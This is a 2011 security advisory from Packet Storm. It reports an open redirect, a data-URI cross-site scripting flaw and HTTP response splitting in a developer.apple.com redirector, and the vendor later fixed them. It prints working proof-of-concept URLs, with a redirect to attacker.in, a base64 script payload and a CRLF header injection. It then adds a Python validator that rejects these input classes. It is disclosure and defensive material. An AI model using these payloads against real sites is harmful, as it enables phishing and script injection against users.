Apple Developer Cross Site Scripting / Redirect

2011-07-01T00:00:00
ID PACKETSTORM:102699
Type packetstorm
Reporter Aung Khant
Modified 2011-07-01T00:00:00

Description

                                        
`Vulnerabilities via URL Redirector in developer.apple.com  
  
  
  
1. VULNERABILITY DESCRIPTION  
  
Arbitrary URL Redirect  
======================  
  
POC (Browsers: All)  
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page  
  
Issue References:  
OWASP Top 10 A10 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project  
CWE 601 - http://cwe.mitre.org/data/definitions/601.html  
  
  
Cross Site Scripting (XSS) Via Arbitrary URL Redirect  
=====================================================  
  
POC (Browsers: Safari, Opera):  
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D  
  
Issue References:  
OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project  
CWE 79 - http://cwe.mitre.org/data/definitions/79.html  
  
  
HTTP Response Splitting (HRS) Via Arbitrary URL Redirect  
========================================================  
  
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!--  
  
Issue References:  
CWE 113 - http://cwe.mitre.org/data/definitions/113.html  
  
  
Demo:  
http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/  
  
  
2. VENDOR  
  
Apple Inc  
http://www.apple.com  
  
  
3. VULNERABILITY STATUS  
  
FIXED  
  
  
4. DISCLOSURE TIME-LINE  
  
2011-04-25: reported to vendor  
2011-04-27: vendor replied "Thank you for forwarding this issue to us.  
We take any report of a potential security issue  
very seriously."  
2011-06-29: vendor replied that the vulnerability was fixed  
2011-07-01: vulnerability was disclosed  
  
  
5. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs  
  
  
#yehg [2011-07-01]  
  
`
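
A server-side check on the `fullURL` value that refuses all three PoC classes listed in the advisory, as an added example that is not part of the original advisory and not Apple's fix. The allowlisted host, scheme set, fallback path and function names are assumptions, and the sample inputs are constructed, shortened forms of the PoC parameter values.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"developer.apple.com"}  # assumption: hypothetical allowlist
ALLOWED_SCHEMES = {"https"}              # assumption: redirector only serves https
FALLBACK = "/membercenter/"              # assumption: hypothetical safe default


def reject_reason(target):
    """Return None if the decoded redirect target is acceptable, else the reason."""
    # CWE-113: CR/LF or any other control/whitespace character could end the
    # Location header early, so refuse the value instead of stripping it.
    if any(c.isspace() or ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return "control or whitespace character"
    # Browsers treat "\" like "/" in http(s) URLs; urlsplit does not.
    if "\\" in target:
        return "backslash"
    try:
        parts = urlsplit(target)
    except ValueError:
        return "unparseable"
    if not parts.scheme and not parts.netloc:
        # Site-relative path. "//host" and "///host" leave the site in a browser.
        if target.startswith("/") and not target.startswith("//"):
            return None
        return "not a site-relative path"
    # CWE-79 via CWE-601: data:, javascript: and similar schemes stop here.
    if parts.scheme not in ALLOWED_SCHEMES:
        return "scheme not allowed"
    # CWE-601: exact host match; userinfo ("user@host") is refused outright.
    if parts.hostname not in ALLOWED_HOSTS or parts.username is not None:
        return "host not allowed"
    return None


def redirect_location(target):
    """Value to place in the Location header for a requested target."""
    return target if reject_reason(target) is None else FALLBACK


# Constructed samples shaped like the advisory's three PoCs (payloads shortened).
SAMPLES = [
    "http://attacker.in/malware_exists_in_this_page",
    "data:text/html;base64,AAAA",
    "http://attacker.in\r\nContent-Type: text/html",
    "/membercenter/",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", reject_reason(s) or "ok")
```

The control-character test runs before `urlsplit` because recent Python versions silently strip CR, LF and tab from the URL during parsing.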